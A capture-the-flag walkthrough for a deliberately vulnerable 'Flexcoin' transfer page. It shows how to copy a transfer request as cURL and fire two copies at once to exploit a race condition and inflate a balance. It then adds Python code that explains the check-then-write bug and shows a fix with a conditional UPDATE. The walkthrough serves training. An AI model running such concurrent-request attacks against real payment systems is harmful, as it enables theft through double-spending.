Walkthrough: Race Conditions (Flexcoin)

Tools Used:
Create two accounts, and log in to one of them. Now open the Chrome Developer Tools.



In the Chrome Developer Tools, open the Network tab and check the "Preserve log" box.



Now in the app, go ahead and send 1 BTC to your second account.



When you click send, a new network call will appear. Find it in the Network tab, and make sure you have the correct one by verifying that the Form Data (bottom right of screenshot) matches what you sent.



Once you find the correct network call, right-click it and choose Copy / Copy as cURL.



You should now have in your clipboard something that looks like this:
curl 'https://php1.hackthe.company/challenge8/index.php' [bunch of junk here] -H 'Cookie: PHPSESSID=s17fftdnm1bpha7fnjou3h2s60' --data 'person_name=testbsb2&send_amount=1' --compressed
         
To make this race condition exploit work, we want to send two requests at the same time. Curl makes that easy: paste the command twice and put an ampersand (&) between the two copies, so the shell runs the first in the background and starts the second without waiting for it.
curl 'https://php1.hackthe.company/challenge8/index.php' [bunch of junk here] -H 'Cookie: PHPSESSID=s17fftdnm1bpha7fnjou3h2s60' --data 'person_name=testbsb2&send_amount=1' --compressed & curl 'https://php1.hackthe.company/challenge8/index.php' [bunch of junk here] -H 'Cookie: PHPSESSID=s17fftdnm1bpha7fnjou3h2s60' --data 'person_name=testbsb2&send_amount=1' --compressed
         
Now you just need to run this in your terminal a number of times. Between runs, you'll need to log into your second account and send the currency back to your first account. Also, as your balance grows, you may want to raise the "send_amount=1" value in the curl commands you copied to speed things up.

Once you manage to obtain 10,000 BTC, the flag will be revealed.
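
Why two simultaneous requests both pass the balance check, and how the server closes the gap, as an added example that is not code from the challenge. The table layout, the account names and the check-then-write handler are assumptions about how such a transfer endpoint is typically written.

```python
import sqlite3

def new_db():
    # Constructed sample data: alice holds 1 coin, bob holds 0.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (name TEXT PRIMARY KEY, balance INTEGER)")
    db.executemany("INSERT INTO accounts VALUES (?, ?)", [("alice", 1), ("bob", 0)])
    return db

def balance(db, name):
    return db.execute("SELECT balance FROM accounts WHERE name = ?", (name,)).fetchone()[0]

def vulnerable_send(db, src, dst, amount):
    # Assumed bug: balance is read, checked, then written back from the stale copy.
    # Written as a generator so two requests can be interleaved deterministically.
    src_balance = balance(db, src)
    if amount <= 0 or src_balance < amount:
        yield False
        return
    yield True  # window between check and write: a second request passes its check here
    db.execute("UPDATE accounts SET balance = ? WHERE name = ?", (src_balance - amount, src))
    db.execute("UPDATE accounts SET balance = balance + ? WHERE name = ?", (amount, dst))

def safe_send(db, src, dst, amount):
    # Check and debit are one conditional UPDATE inside one transaction, so the
    # database serializes them and leaves no window for a second request.
    if amount <= 0:
        return False
    with db:
        debit = db.execute(
            "UPDATE accounts SET balance = balance - ? WHERE name = ? AND balance >= ?",
            (amount, src, amount))
        if debit.rowcount != 1:
            return False  # insufficient funds: nothing is credited
        db.execute("UPDATE accounts SET balance = balance + ? WHERE name = ?", (amount, dst))
    return True

def race_vulnerable():
    db = new_db()
    first, second = (vulnerable_send(db, "alice", "bob", 1) for _ in range(2))
    checks = [next(first), next(second)]  # both checks run before either write
    for request in (first, second):
        next(request, None)               # now both writes land
    return checks, balance(db, "alice"), balance(db, "bob")

def race_safe():
    db = new_db()
    results = [safe_send(db, "alice", "bob", 1) for _ in range(2)]
    return results, balance(db, "alice"), balance(db, "bob")
```

With the vulnerable handler one coin becomes two; with the conditional UPDATE the second transfer is refused and the total stays at one.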